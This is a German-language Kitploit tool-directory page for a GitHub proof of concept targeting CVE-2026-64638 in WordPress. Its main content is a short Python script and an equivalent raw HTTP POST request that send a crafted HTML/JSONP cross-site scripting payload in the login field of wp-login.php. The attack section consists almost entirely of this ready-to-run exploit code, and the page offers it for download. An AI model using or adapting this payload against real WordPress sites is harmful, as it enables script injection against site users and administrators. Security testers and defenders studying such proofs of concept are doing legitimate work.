Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-64638 — Minimaler Python-Proof-of-Concept für CVE-2026-64638, der einen manipulierten HTML/JSONP-XSS-Payload an die WordPress-Datei wp-login.php sendet. | Kitploit
Tools/GitHubGitHub/5yu4n/cve-2026-64638
SchwachstellenanalyseExploitationWebanwendungs-ExploitationWebsicherheit
GitHub5yu4n/cve-2026-64638

CVE-2026-64638

Minimaler Python-Proof-of-Concept für CVE-2026-64638, der einen manipulierten HTML/JSONP-XSS-Payload an die WordPress-Datei wp-login.php sendet.

Repository anzeigen
1vor 12 TagenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2026-64638

CVE-2026-64638

schneller Versuch

root@kitploit:~
import requests

target = "http://127.0.0.1:9000/wp-login.php"
payload = '< area id=ajaxurl href=/?rest_route=/&_method=GET&_jsonp=alert>< div id=color-picker class=reset-pass-submit>< button class="wp-generate-pw color-option">X'
response = requests.post(target, data={"log": payload, "pwd": "x"}, timeout=5)
print(response.status_code)
print(response.text)

oder

root@kitploit:~
POST /wp-login.php HTTP/1.1
Host: 127.0.0.1:9000
Content-Type: application/x-www-form-urlencoded
User-Agent: python-requests
Accept: */*
Connection: close

log=%3C+area+id%3Dajaxurl+href%3D%2F%3Frest_route%3D%2F%26_method%3DGET%26_jsonp%3Dalert%3E%3C+div+id%3Dcolor-picker+class%3Dreset-pass-submit%3E%3C+button+class%3D%22wp-generate-pw+color-option%22%3EX&pwd=x
Tool herunterladen